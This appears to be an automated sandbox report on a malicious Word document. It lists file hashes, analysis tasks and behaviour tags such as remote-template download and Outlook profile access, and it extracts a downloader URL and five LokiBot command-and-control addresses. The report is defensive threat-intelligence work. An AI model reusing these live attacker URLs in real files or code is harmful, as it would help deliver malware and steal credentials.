General
-
Target
e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
-
Size
10KB
-
Sample
230310-xe59vaeh59
-
MD5
d0a30c0613166d9eff01470fd074f7fc
-
SHA1
54832f5e30a4588211a212fc55d14dc9b23a656c
-
SHA256
ba45bd57955b02375e7aaf23a00a02343506d3b1789a1e33dd51c20ff4b083e9
-
SHA512
d088ff01822976d6de61d9d801fb9eecb56d27b842f54023213b051d05ebe8dd267082e36baf3bbf4105accc5bc5a892f3140225cd8dfaedac2b55412857d95c
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uOR4nl+CVWBXJC0c3Pp:SPXU/slT+LOR6HkZC9B
Static task
static1
Behavioral task
behavioral1
Sample
e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://yyyyyYYYYUUSUUUUUUU3243242UUU23U423U4UU2UWWWWW8W8W7W8WWWWWWW878W8W8WW78WWWW87W87W88WEEW787888W88W8W@1806685202/ru2........................doc
Extracted
lokibot
http://185.246.220.60/shen/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Targets
-
-
Target
e270a30a-6fe8-4c9a-b9ab-5e70157ffa13.docx
-
Size
10KB
-
MD5
d0a30c0613166d9eff01470fd074f7fc
-
SHA1
54832f5e30a4588211a212fc55d14dc9b23a656c
-
SHA256
ba45bd57955b02375e7aaf23a00a02343506d3b1789a1e33dd51c20ff4b083e9
-
SHA512
d088ff01822976d6de61d9d801fb9eecb56d27b842f54023213b051d05ebe8dd267082e36baf3bbf4105accc5bc5a892f3140225cd8dfaedac2b55412857d95c
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uOR4nl+CVWBXJC0c3Pp:SPXU/slT+LOR6HkZC9B
Score10/10-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-